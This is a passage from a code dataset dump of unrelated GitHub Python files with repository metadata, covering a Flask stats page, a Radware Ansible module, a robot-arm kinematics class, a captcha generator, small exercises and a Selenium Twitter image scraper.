new_timetable\n\n\n\n\n\n","repo_name":"Irina-Nazarova/algorithms_course","sub_path":"recursion/task_timetable.py","file_name":"task_timetable.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"40348018510","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Aug 31 21:12:47 2020\r\n\r\n@author: Sai Nidhi\r\n\"\"\"\r\n\r\nfrom flask import Flask, render_template\r\nimport requests\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route('/')\r\ndef index():\r\n names = ['Shalini','deepti','sahas']\r\n date = []\r\n for i in names:\r\n url = \"https://hqzkbqq5d2.execute-api.ap-south-1.amazonaws.com/sanitizerretrieve?Name=\"+i\r\n resp = requests.get(url)\r\n data = resp.json()\r\n print(data)\r\n #[{'name': 'sandeep', 'date': '31-09-2020'}]\r\n date.append(data['Date'])\r\n return render_template('stats.html', p1= names[0],d1=date[0], p2=names[1], d2=date[1])\r\n\r\n\r\nif __name__ == 
'__main__':\r\n app.run(host='0.0.0.0', port=5000, debug=True)","repo_name":"DeeptiTeragunti/Smart_SanitizationMonitoringApp","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"43122573194","text":"from fit.Parse import Parse\nfrom fit.Fixture import Fixture\nimport fit.TypeAdapter as TypeAdapter\n\nclass CellHandlerInspector(Fixture):\n def doTable(self, table):\n handlerList = TypeAdapter.getCurrentCellHandlerList()\n lastrow = table.parts\n for handler in handlerList:\n lastrow.more = Parse(tag=\"tr\",\n parts=Parse(tag=\"td\", body=handler.__class__.__name__))\n lastrow = lastrow.more\n","repo_name":"Apress/foundations-of-agile-python-dev","sub_path":"Chapter11/rsreader/tools/pyfit/fit/fit/CellHandlerInspector.py","file_name":"CellHandlerInspector.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"44"} +{"seq_id":"27815225207","text":"import threading\n\n\nclass MyClass(threading.Thread):\n def __init__(self, rank):\n super().__init__()\n self.rank = rank\n \n \n def run(self):\n print(\"Hello from %s\" % threading.get_ident())\n \n \nif __name__ == \"__main__\":\n th_list = []\n for i in range(4):\n th = MyClass(i)\n th_list.append(th) \n th.start()\n \n\n for th in th_list:\n th.join()\n \n print(\"end of thread_ex01\")\n","repo_name":"effort-type/ParallelProgramming","sub_path":"PythonProjects/thread_programs/thread_ex1.py","file_name":"thread_ex1.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"31112175200","text":"import os\n\n#создание класса для продуктов\nclass Products:\n \n def __init__(self, name, price):\n self.name = name # название \n self.price = price # цена\n\n\nprdcts = list() #пустой список, в котором будут храниться объекты продуктов\n\n#функция для добавления нового объекта продукта в список\ndef add_to_list(name, price):\n prdcts.append(Products(name,price))\n\n# функция отображения объектов списка с порядковыми номерами \ndef show_prdcts(productlist):\n i =0\n for obj in productlist:\n i +=1\n print(str(i) + '.', obj.name, obj.price)\n\n\n#объявление переменной файла + цикл проверки на заполненность\nfilename = ''\nwhile filename == '':\n filename = input('Введите имя файла: ')\nelse:\n \n print(\"Имя введеого файла \" + filename)\n#\"пробуем\" открыть файл\ntry:\n f= open(filename , 'r+', encoding='utf-8')\n \n for line in f: #считываем построчно файл\n line = line.replace('\\n', '') #удаляем символ новой строки путем замены на пустое значение\n line = line.split(' — ') #делим значения по разделителю ' — '\n add_to_list(line[0],line[1]) # добавляем объект в список \n \n\n\n #Выбираем действие для работы со списком\n action = ''\n #Цикл для работы со списком до тех пор пока не будет введено \"6\"\n while action != '6': \n print('\\n1. Добавить продукт в список\\n2. Изменить продукт в списке\\n3.'+ \n 'Удалить продукт из списка\\n4. Расчитать общую сумму продуктов \\n5. Посмотреть список продуктов\\n6. 
Выйти')\n action = input(\"Выберите нужное действие: \")\n \n if action == '1': #Если вводим 1 \"Добавить продукт в список\"\n add_to_list(input('Введите название продукта: '),input('Введите цену: '))\n \n elif action == '2': #Если вводим 2 \"Изменить продукт в списке\"\n show_prdcts(prdcts)\n choicenum = int(input(\"Выберите порядковый номер позиции для изменения: \"))\n choicenum -= 1\n prdcts[choicenum].name = input(\"Введите название: \")\n prdcts[choicenum].price = input(\"Введите цену: \")\n \n elif action == '3': #Если вводим 3 \"Удалить продукт из списка\"\n show_prdcts(prdcts)\n choicenum = int(input(\"Выберите порядковый номер позиции для удаления: \"))\n choicenum -= 1\n prdcts.pop(choicenum)\n \n elif action == '4': #Если вводим 4 \"Расчитать общую сумму продуктов\"\n sum = 0\n for obj in prdcts:\n sum += int(obj.price)\n print('Сумма = ', str(sum))\n \n elif action == '5': #Если вводим 5 \"Посмотреть список продуктов\"\n show_prdcts(prdcts)\n\n f.seek(0,0) #возращаем курсор в начало списка\n for prdc in prdcts: #для каждого элемента списка формируем строку по формату исходной и записываем в файл\n rowtofile = str(prdc.name)+ ' — ' + str(prdc.price) + \"\\n\"\n f.write(rowtofile)\n f.close() #закрываем файл\n\n\n#исключение в случае, если файл не найден, программа завершается и выводит сообщение\nexcept FileNotFoundError:\n print('Файл с таким именем не найден, повторите попытку.')\n\n#input() #пустой инпут, для отладки","repo_name":"YodaKHV/python-alif","sub_path":"taskforwork.py","file_name":"taskforwork.py","file_ext":"py","file_size_in_byte":4360,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"37797021571","text":"import random\n\n# Guardar el resultado de calculos previos para evitar recursiones muy grandes a medida que voy creciendo.\nmemo = [0, 1, 1]\n\n# Fibonacci pero con la primer posicion siendo 0\ndef fibonacci(n):\n if len(memo) <= n:\n res = fibonacci(n-1) + fibonacci(n-2)\n memo.append(res)\n return res\n else:\n return memo[n]\n\ndef estimar_entrega(distancia):\n rango = distancia // 100\n return fibonacci(rango), rango\n\n\ndistancias = sorted([random.randint(0, 2000) for x in range(20)])\n\nfor distancia in distancias:\n dias, rango = estimar_entrega(distancia)\n print(f'El tiempo de entrega para una distancia de {distancia}km con rango {rango} es {dias} dias')\n","repo_name":"mat105/enviame-backend-test","sub_path":"Ejercicio-6/estimar.py","file_name":"estimar.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"16587490603","text":"import os\nimport pandas as pd\nimport argparse\nimport sys\n\nprint(\"On python, Arguments are: \",sys.argv)\nargs = sys.argv\ninputDir = args[1]\ntrait = args[2]\narea = args[3]\nsnp = args[4]\n#Comment\n\n#check if inputs are read correctly\nprint(\"input directory path:\",inputDir)\nprint(\"trait: \",trait)\nprint(\"area: \",area)\nprint(\"snp: \",snp)\n\ninput_list = os.listdir(inputDir)\nprint(\"Input list length: \", len(input_list))\n\nmerged_data = pd.DataFrame()\n\nindex = 0\nfor file_name in input_list:\n csv = pd.read_csv(inputDir+'/'+file_name)\n df = pd.DataFrame(csv)\n df.columns = df.columns.str.upper()\n #print(file_name)\n f1 = df.loc[(df[\"TRAIT\"]==trait)&(df['AREA']==area)&(df['SNP']==snp)]\n merged_data = pd.concat([merged_data, f1],sort=False)\n index += 1\n\n \nmerged_data.rename(columns={'STUDY':'Study'}, 
inplace=True)\nmerged_data.sort_values(by=['Study'])\nprint(\"Merged CSV\",merged_data.head())\n\nmerged_data.to_csv(path_or_buf=args[-1],index=False)\n","repo_name":"mosoriob/enigma_domain","sub_path":"code/library/MergeAndFilter/MergeAndFilter.py","file_name":"MergeAndFilter.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"14398010836","text":"from pathlib import Path\n\nimport tablib\nfrom faker import Faker\n\n\nclass StreamDataGenerator:\n\n def __init__(self, seed=0, data_dir='data', start_year=2000, end_year=2022, company_count=10):\n print(f'Generating data for {company_count} companies in {start_year}-{end_year}')\n Faker.seed(seed)\n self.faker = Faker(['en_GB'])\n self.organisations = [self.faker.company() for _ in range(company_count)]\n self.years = list(range(start_year, end_year))\n self.DATA_DIR = Path(data_dir)\n\n def generate_data(self):\n \"\"\"\n Generate a list of random data.\n\n :param num_rows: number of rows to generate\n :return: list of random data\n \"\"\"\n\n for org in self.organisations:\n for year in self.years:\n print(f'Generating data for {org} in {year}')\n self.generate_files(org, year)\n\n def generate_files(self, org, year):\n _modes = ['csv', 'xslx-single', 'xslx-multi']\n _mode = self.faker.random.choice(_modes)\n datasets = self.generate_dataset(org, year)\n if _mode == 'csv':\n return self.save_csv(org, year, datasets)\n elif _mode == 'xslx-single':\n return self.save_xlsx_single(org, year, datasets)\n elif _mode == 'xslx-multi':\n return self.save_xlsx_multi(org, year, datasets)\n\n def generate_dataset(self, org, year):\n col_count = 10\n sheet_data = []\n for sheets in range(1, 11):\n headers = [\n self.get_column_name(col+1)\n for col in range(col_count)\n ]\n data = tablib.Dataset(headers=headers)\n for row in range(1, self.faker.random.randint(20, 100)):\n data.append([\n self.faker.first_name(),\n self.faker.last_name(),\n self.faker.job(),\n self.faker.address(),\n self.faker.random.randint(13, 99),\n self.faker.address(),\n self.faker.credit_card_number(),\n year,\n org,\n self.faker.bs(),\n ])\n sheet_data.append(data)\n return sheet_data\n\n def get_column_name(self, col):\n prefix = self.faker.random.choice(['col', 'c', 'column'])\n style = self.faker.random.choice(['lower', 'camel', 'upper'])\n if style == 'camel':\n prefix = prefix[0].upper() + prefix[1:]\n elif style == 'upper':\n prefix = prefix.upper()\n\n separator = self.faker.random.choice(['_', '-', '', ''])\n return f'{prefix}{separator}{col}'\n\n def save_csv(self, org, year, datasets):\n sheet_prefix = self.faker.random.choice(['table', 'sheet', 'data'])\n separator = self.faker.random.choice(['_', '-', '', ''])\n pattern = self.faker.random.choice([\n '{org}-{year}-{sheet}.csv',\n '{org}/{year}/{sheet_prefix}{separator}{sheet}.csv',\n '{year}/{org}/{sheet_prefix}{separator}{sheet}.csv',\n '{year}-{org}/{sheet_prefix}{separator}{sheet}.csv',\n '{org}-{year}/{sheet_prefix}{separator}{sheet}.csv',\n ])\n for sheet, data in enumerate(datasets):\n filename = pattern.format(\n org=org,\n year=year,\n sheet_prefix=sheet_prefix,\n separator=separator,\n sheet=sheet+1,\n )\n filename = self.DATA_DIR / filename\n filename.parent.mkdir(parents=True, exist_ok=True)\n with open(filename, 'wt') as f:\n f.write(data.export('csv'))\n\n def save_xlsx_single(self, org, year, datasets):\n sheet_prefix = self.faker.random.choice(['table', 'sheet', 'data'])\n separator = 
self.faker.random.choice(['_', '-', '', ''])\n pattern = self.faker.random.choice([\n '{org}-{year}-{sheet}.csv',\n '{org}/{year}/{sheet_prefix}{separator}{sheet}.xlsx',\n '{year}/{org}/{sheet_prefix}{separator}{sheet}.xlsx',\n '{year}-{org}/{sheet_prefix}{separator}{sheet}.xlsx',\n '{org}-{year}/{sheet_prefix}{separator}{sheet}.xlsx',\n ])\n for sheet, data in enumerate(datasets):\n filename = pattern.format(\n org=org,\n year=year,\n sheet_prefix=sheet_prefix,\n separator=separator,\n sheet=sheet+1,\n )\n filename = self.DATA_DIR / filename\n filename.parent.mkdir(parents=True, exist_ok=True)\n with open(filename, 'wb') as f:\n f.write(data.export('xlsx'))\n\n def save_xlsx_multi(self, org, year, datasets):\n sheet_prefix = self.faker.random.choice(['table', 'sheet', 'data'])\n separator = self.faker.random.choice(['_', '-', '', ''])\n pattern = self.faker.random.choice([\n '{org}-{year}.xlsx',\n '{org}/{year}.xlsx',\n '{year}/{org}.xlsx',\n '{year}-{org}.xlsx',\n '{org}-{year}.xlsx',\n ])\n for sheet, data in enumerate(datasets):\n data.title = f'{sheet_prefix}{separator}{sheet+1}'\n databook = tablib.Databook(datasets)\n\n filename = pattern.format(\n org=org,\n year=year,\n sheet_prefix=sheet_prefix,\n separator=separator,\n )\n filename = self.DATA_DIR / filename\n filename.parent.mkdir(parents=True, exist_ok=True)\n with open(filename, 'wb') as f:\n f.write(databook.export('xlsx'))\n\n\nif __name__ == '__main__':\n generator = StreamDataGenerator()\n generator.generate_data()\n","repo_name":"kws/sfdata-stream-tutorial","sub_path":"sfdata_stream_tutorial/_generate.py","file_name":"_generate.py","file_ext":"py","file_size_in_byte":5730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"36589294873","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nfrom django.views.generic import RedirectView\n\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n url(r'^$', RedirectView.as_view(url='/blog/')),\n url(r'^blog/', include('blog.urls')),\n url(r'^trash/', include('trash.urls')),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^grappelli/', include('grappelli.urls')),\n)\n","repo_name":"michaelamie/mta-x.net","sub_path":"mtax/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"72372696132","text":"#! 
python3\n\nimport openpyxl, os\n\nimport setup\n\nfilename = 'writeFormula.xlsx'\n\n# create\nwb = openpyxl.Workbook()\nsheet = wb.active\nsheet['A1'] = 200\nsheet['A2'] = 300\nsheet['A3'] = '=SUM(A1:A2)'\nwb.save(filename)\n\n\nwb_formulas = openpyxl.load_workbook(filename, data_only=False)\nsheet = wb_formulas.active\nformula = sheet['A3'].value\n\nwb_data_only = openpyxl.load_workbook(filename, data_only=True)\nsheet = wb_data_only.active\nvalue = sheet['A3'].value\n\nprint('{}, {}'.format(formula, value)) # => =SUM(A1:A2), None\n\n","repo_name":"friendbear/AutomateWithPython","sub_path":"excel/formula.py","file_name":"formula.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"43370846914","text":"import os\n\ndef pullValue(theChar):\n\tif theChar.isupper():\n\t\treturn ord(theChar)-38\n\telse:\n\t\treturn ord(theChar)-96\n\ncurFile = open(\"input.txt\",'r').readlines()\narrayList=[]\ntempTotal=0\ncurMax=0\ntotalArray=[]\nset1=set()\nset2=set()\nprioritySum=0\nfor line in curFile:\n\tarrayList.append(line[:-1])\n\t\nprint(arrayList)\n\nfor line in arrayList:\n\tset1=set(line[0:len(line)//2])\n\tset2=set(line[(len(line)//2):len(line)+1])\n\tsetIntersect=set1.intersection(set2)\n\tprint(set2)\n\tprint(set1)\n\tprint(setIntersect)\n\tprioritySum +=pullValue(list(setIntersect)[0])\nprint(prioritySum)","repo_name":"Briar-S/Advent-Of-Code","sub_path":"DAY3/DAY3_1.py","file_name":"DAY3_1.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"28999045699","text":"N,M=list(map(int,input().split()))\nmon=list(map(int,input().split()))\narr=[[0]*(M+1)for _ in range(N)]\n\nfor i in range(1,M+1):\n if(mon[0]>i):\n arr[0][i]=0\n if(i%mon[0]==0):\n arr[0][i]=i//mon[0]\nfor i in range(1,N):\n for j in range(1,M+1):\n if(mon[i]>j):\n arr[i][j]=arr[i-1][j]\n else:\n ch1=arr[i][j-mon[i]]+1\n if(ch1==1): # 현재 화폐를 통해 못만듦\n arr[i][j]=arr[i-1][j]\n if(j==mon[i]):\n arr[i][j]=1\n elif(arr[i-1][j]!=0): # 과거에도 만들기 가능\n arr[i][j]=min(arr[i-1][j],ch1)\n elif(arr[i-1][j]==0): #과거에도 못만듦\n if(ch1!=1): #현재 화폐로는 만들기 가능\n arr[i][j]=ch1\n else: #현재도 불가능\n arr[i][j]=0\nprint(arr)\n\nif(arr[N-1][M]==0):\n print(-1)\nelse:\n print(arr[N-1][M])","repo_name":"Silky-ai/codingtest_book_2020","sub_path":"다이나믹프로그래밍/효율적인 화폐 구성.py","file_name":"효율적인 화폐 구성.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"2495675527","text":"#!/usr/bin/python\r\n#\r\n# Copyright (c) Ansible Project\r\n# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)\r\n\r\nfrom __future__ import absolute_import, division, print_function\r\n__metaclass__ = type\r\n\r\nfrom abc import abstractmethod\r\nfrom ansible.module_utils.basic import AnsibleModule\r\nfrom ansible_collections.radware.radware_modules.plugins.module_utils.common import BaseAPI, RadwareModuleError, radware_server_argument_spec, \\\r\n build_specs_from_annotation\r\ntry:\r\n from radware.sdk.api import BaseDeviceConnection\r\n from radware.sdk.exceptions import RadwareError\r\n from radware.sdk.management import DeviceManagement\r\n from radware.sdk.configurator import DeviceConfigurationManager, ConfigManagerResult, MSG_NO_CHANGE\r\nexcept ModuleNotFoundError:\r\n AnsibleModule(argument_spec={}, check_invalid_arguments=False).fail_json(\r\n msg=\"The 
radware-sdk-common package is required\")\r\n\r\n\r\nANSIBLE_METADATA = {'metadata_version': '1.1',\r\n 'status': ['stableinterface'],\r\n 'supported_by': 'certified'}\r\n\r\nDOCUMENTATION = r'''\r\nmodule: Device Configurator module\r\nauthor:\r\n - Leon Meguira (@leonmeguira)\r\n'''\r\n\r\nDEFAULT_STATE = ['present', 'absent']\r\nEXCLUDE_STATE = ['read_all']\r\nSDK_TO_ANSIBLE_CMD = {\r\n 'deploy': 'overwrite',\r\n 'delete': 'absent',\r\n 'update': 'append'\r\n}\r\nANSIBLE_TO_SDK_CMD = {\r\n 'overwrite': 'deploy',\r\n 'absent': 'delete',\r\n 'present': 'update',\r\n 'append': 'update'\r\n}\r\n\r\n\r\ndef configuration_choice_translation(sdk_choices):\r\n choices = list()\r\n choices.extend(DEFAULT_STATE)\r\n for item in sdk_choices:\r\n if item in EXCLUDE_STATE:\r\n continue\r\n if item in SDK_TO_ANSIBLE_CMD:\r\n if SDK_TO_ANSIBLE_CMD[item] not in DEFAULT_STATE:\r\n choices.append(SDK_TO_ANSIBLE_CMD[item])\r\n else:\r\n choices.append(item)\r\n return choices\r\n\r\n\r\nclass ConfigurationArgumentSpec(object):\r\n def __init__(self, config_class):\r\n self.supports_check_mode = True\r\n argument_spec = dict(\r\n parameters=dict(\r\n required=False,\r\n type='dict',\r\n options=build_specs_from_annotation(config_class.get_parameters_class())\r\n ),\r\n state=dict(\r\n required=True,\r\n choices=configuration_choice_translation(config_class.api_function_names())\r\n ),\r\n write_on_change=dict(\r\n required=False,\r\n type='bool',\r\n default=False\r\n )\r\n )\r\n self.argument_spec = {}\r\n self.argument_spec.update(radware_server_argument_spec)\r\n self.argument_spec.update(argument_spec)\r\n\r\n\r\nclass ConfigurationModule(BaseAPI):\r\n \"\"\"\r\n generate input param object from dict\r\n create 'DeviceConfigurationManager' instance\r\n execute configurator and return dict result to caller\r\n \"\"\"\r\n def __init__(self, configurator_class, **kwargs):\r\n self._configurator = configurator_class(self._device_connection)\r\n self._config_manager = DeviceConfigurationManager()\r\n self._state = self._base.params['state']\r\n self._write_on_change = self._base.params['write_on_change']\r\n if self._state == 'present':\r\n self._differential_update = True\r\n else:\r\n self._differential_update = False\r\n\r\n self.arguments = configurator_class.get_parameters_class()()\r\n if self._base.params['parameters'] is None:\r\n self._base.params['parameters'] = dict()\r\n self.arguments.set_attributes(**self._base.params['parameters'])\r\n self.result = {}\r\n self.changed = False\r\n self.changes = None\r\n if hasattr(self._base.module, '_diff'):\r\n self._report_diff = getattr(self._base.module, '_diff')\r\n else:\r\n self._report_diff = False\r\n\r\n @abstractmethod\r\n def _on_error(self):\r\n pass\r\n\r\n @property\r\n def command(self):\r\n if self._state in ANSIBLE_TO_SDK_CMD:\r\n return ANSIBLE_TO_SDK_CMD[self._state]\r\n else:\r\n return self._state\r\n\r\n def exec_module(self):\r\n def prepare_object():\r\n device_current = self._config_manager.execute(self._configurator, 'read', self.arguments).content_translate\r\n if device_current is None:\r\n return self._base.params['parameters']\r\n if self._base.module.check_mode:\r\n if '---' in self.changes:\r\n for key in self.changes['---'].keys():\r\n if key in device_current:\r\n if type(self.changes['---'][key]) == list:\r\n for item in self.changes['---'][key]:\r\n device_current[key].remove(item)\r\n else:\r\n del device_current[key]\r\n if '+++' in self.changes:\r\n for key in self.changes['+++'].keys():\r\n if 
type(self.changes['+++'][key]) == list:\r\n if type(device_current[key]) != list:\r\n device_current[key] = []\r\n for item in self.changes['+++'][key]:\r\n device_current[key].append(item)\r\n else:\r\n device_current[key] = self.changes['+++'][key]\r\n return device_current\r\n\r\n # try:\r\n # self._device_mng.verify_device_accessible(retries=2)\r\n # except RadwareError as e:\r\n # raise RadwareModuleError(e)\r\n\r\n try:\r\n conf_mng_result = self._config_manager.execute(self._configurator, self.command, self.arguments,\r\n dry_run=self._base.module.check_mode,\r\n differential=self._differential_update,\r\n write_on_change=self._write_on_change,\r\n get_diff=True)\r\n if conf_mng_result.diff:\r\n self.changed = True\r\n self.changes = conf_mng_result.diff\r\n except RadwareError as e:\r\n self._on_error()\r\n raise RadwareModuleError(e)\r\n\r\n if self.changed:\r\n self.result.update(dict(changed=self.changed))\r\n if self._report_diff:\r\n self.result.update(dict(diff=self.changes))\r\n self.result.update(status=conf_mng_result.content_translate, obj=prepare_object())\r\n else:\r\n if self._state in ANSIBLE_TO_SDK_CMD:\r\n self.result.update(status=MSG_NO_CHANGE, obj=None)\r\n else:\r\n if self._state == 'read':\r\n read_result = conf_mng_result.content_translate\r\n if read_result:\r\n self.result.update(status='found', obj=read_result)\r\n else:\r\n self.result.update(status='not found', obj=read_result)\r\n else:\r\n self.result.update(status=conf_mng_result.content_translate, obj=None)\r\n return self.result\r\n\r\n\r\n","repo_name":"Radware/radware-ansible","sub_path":"plugins/module_utils/configuration.py","file_name":"configuration.py","file_ext":"py","file_size_in_byte":7362,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"44"} +{"seq_id":"31459626356","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.spatial.distance import euclidean\n\nclass RobotArm:\n def __init__(self, links=[50, 40, 40], target_pos=[0, 0]):\n # Robot link length parameter\n self.links = links\n self.target_pos = target_pos\n\n def rotateZ(self, theta):\n rz = np.array([[np.cos(theta), - np.sin(theta), 0, 0],\n [np.sin(theta), np.cos(theta), 0, 0],\n [0, 0, 1, 0],\n [0, 0, 0, 1]])\n return rz\n\n def translate(self, dx, dy, dz):\n t = np.array([[1, 0, 0, dx],\n [0, 1, 0, dy],\n [0, 0, 1, dz],\n [0, 0, 0, 1]])\n return t\n\n # Forward Kinematics\n def FK(self, joints_angle):\n n_links = len(self.links)\n P = []\n P.append(np.eye(4))\n for i in range(0, n_links):\n R = self.rotateZ(joints_angle[i])\n T = self.translate(self.links[i], 0, 0)\n P.append(P[-1].dot(R).dot(T))\n return P\n\n # Here is objective function\n # GA will minimize this function\n def calc_distance_error(self, joints_angle):\n P = self.FK(joints_angle)\n current_pos = [float(P[-1][0, 3]), float(P[-1][1, 3])]\n error = euclidean(current_pos, self.target_pos)\n return error\n\n # Plot joint configuration result\n def plot(self, joints_angle):\n fig = plt.figure()\n ax = fig.add_subplot(1, 1, 1)\n P = self.FK(joints_angle)\n for i in range(len(self.links)):\n start_point = P[i]\n end_point = P[i + 1]\n ax.plot([start_point[0, 3], end_point[0, 3]], [start_point[1, 3], end_point[1, 3]], linewidth=5)\n plt.grid()\n plt.show()\n","repo_name":"artbug-nova/genetic","sub_path":"sources/robot.py","file_name":"robot.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} 
+{"seq_id":"26331967279","text":"from django import forms\n\nfrom .models import Kitten\n\nclass KittenForm(forms.ModelForm):\n BATHROOM_TYPES = (\n ('urine','urine'),\n ('bm','bowel movement'),\n ('none','none'),\n )\n name = forms.CharField(widget=forms.TextInput(attrs={'readonly':'True'}))\n pre_feed = forms.IntegerField()\n post_feed = forms.IntegerField()\n bathroom = forms.CharField()\n #bathroom = forms.CharField(widget=forms.Select(choices=BATHROOM_TYPES))\n\n class Meta:\n model = Kitten\n fields = ('name','pre_feed','post_feed','bathroom')","repo_name":"Decap1tator/kittennursery","sub_path":"feeding/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"6329899309","text":"import unittest\nimport sys\nimport os\n# COMPATIBILITY: since python 3.3 mock is included in unittest module\npython_version = sys.version_info\nif python_version[:2] <= (3, 3):\n import mock\n from mock import patch\nelse:\n import unittest.mock as mock\n from unittest.mock import patch\n\n# pyConnectomist import\nimport pyconnectomist\nfrom pyconnectomist.utils.pdftools import generate_pdf\n\n\nclass PDFReportCreator(unittest.TestCase):\n \"\"\" Test the PDF report creator:\n 'pyconnectomist.utils.pdftools.generate_pdf'\n \"\"\"\n def setUp(self):\n \"\"\" Define fucntion parameters.\n \"\"\"\n self.kwargs = {\n \"datapath\": \"/my/path/mock_datadir\",\n \"struct_file\": os.path.join(\n os.path.abspath(os.path.dirname(pyconnectomist.__file__)),\n \"utils\", \"resources\", \"pyconnectomist_qcfast.json\"),\n \"author\": \"Author\",\n \"client\": \"Client\",\n \"poweredby\": \"PoweredBy\",\n \"project\": \"Project\",\n \"timepoint\": \"Timepoint\",\n \"subject\": \"Subejct\",\n \"date\": \"Date\",\n \"title\": \"Title\",\n \"filename\": \"/my/path/mock_pdffile\",\n \"pagesize\": None,\n \"left_margin\": 10,\n \"right_margin\": 10,\n \"top_margin\": 20,\n \"bottom_margin\": 20,\n \"show_boundary\": False,\n \"verbose\": 1\n }\n\n @mock.patch(\"pyconnectomist.utils.pdftools.PDFcreator.update\")\n def test_normal_execution(self, mock_update):\n \"\"\" Test the normal behaviour of the function.\n \"\"\"\n # Test execution\n generate_pdf(**self.kwargs)\n self.assertEqual(len(mock_update.call_args_list), 1)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"neurospin/pyconnectomist","sub_path":"pyconnectomist/tests/tests_utils/test_pdftools.py","file_name":"test_pdftools.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"74638083014","text":"from captcha.image import ImageCaptcha\nimport random as rd\n\ndef random_captcha():\n charc=\"abcdefghijktuvwxyzAIJKLlmnopqrsMNOPQRSTUVBCDEFGHWXYZ1234567890\"\n LEN=6\n data=''\n for i in range(6):\n i=rd.randint(0,len(charc)-1)\n data=data+charc[i]\n imc=ImageCaptcha(width=200,height=100)\n imc.write(data,'out.png')\n print(\"Random Image Captcha generated\")\nrandom_captcha()\n","repo_name":"ksdkamesh99/NewFangled-Scripts","sub_path":"captcha generator/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"44"} +{"seq_id":"28983187380","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.wait import 
WebDriverWait\nfrom time import sleep\nimport json\nimport keys\nimport random\nfrom urllib import request\nimport os\n\nverbose = False\nperfils_file = 'perfiles.json'\nimages_path = 'images/'\nPATH = \"chromedirver.exe\"\nmax_images = 10 # cantidad de imagenes que se descargan\n\n\ndriver = webdriver.Chrome(PATH)\ndriver.implicitly_wait(10)\n\n# descarga una imagen de internet\n# Descarga una imagen de una cuenta de usuario y la guarda en su propia carpeta\n\n\ndef download_image(web_url, folder=images_path, img_name=None):\n log(f'Downloading {web_url} to {folder}')\n # create folder if do not exist\n os.makedirs(folder, exist_ok=True)\n\n # genera un nombre aleatorio para la imgaen, cunado no hay parametro img_name\n if img_name == None:\n name = random.randrange(1, 100)\n img_name = name\n \n # control de colision de nombres de archivos ---------------------\n while image_exist(folder, img_name):\n if type(img_name) == int:\n new_image_name = img_name + 1\n else:\n new_image_name = f'{img_name}b'\n img_name = new_image_name\n \n # genera la ruta completa de la imagen\n fullname = f'{folder}/{img_name}.png'\n\n # descarga la imagen de internet\n request.urlretrieve(web_url, fullname)\n\n print('+ '+fullname)\n\n# guarda el registro de las descargas en un archivo\n\n\ndef save_accounts_dict(accounts: dict, perfils_file=perfils_file):\n log(f'Saveing the dictionary to {perfils_file} file')\n\n if len(accounts) == 0:\n return\n\n with open(perfils_file, \"w\") as fp:\n json.dump(accounts, fp, indent=4)\n\n# carga el dicionario de registro de descargas del archivo\n\n\ndef load_accounts_dict(perfils_file=perfils_file):\n log(f'Loading accounts from {perfils_file} file')\n if not perfils_file in os.listdir():\n print(\n f\"Error al cargar el registro de descargas, no extiste el archivo {perfils_file}\")\n return {}\n\n with open(perfils_file, \"r\") as fp:\n accounts_dict = json.load(fp)\n\n return dict(accounts_dict)\n\n# go to account and scrape their images\n\n\ndef get_images_from(account, max_images=max_images):\n log(f'Getting {max_images} images from {account}')\n\n driver.get('https://twitter.com/' + account)\n\n # Open carrusel\n try:\n carrusel = driver.find_element(\n By.XPATH, '//div[@class=\"css-1dbjc4n r-1iusvr4 r-16y2uox r-a5pmau r-bnwqim\"][1]')\n carrusel.click()\n except:\n print('Error. 
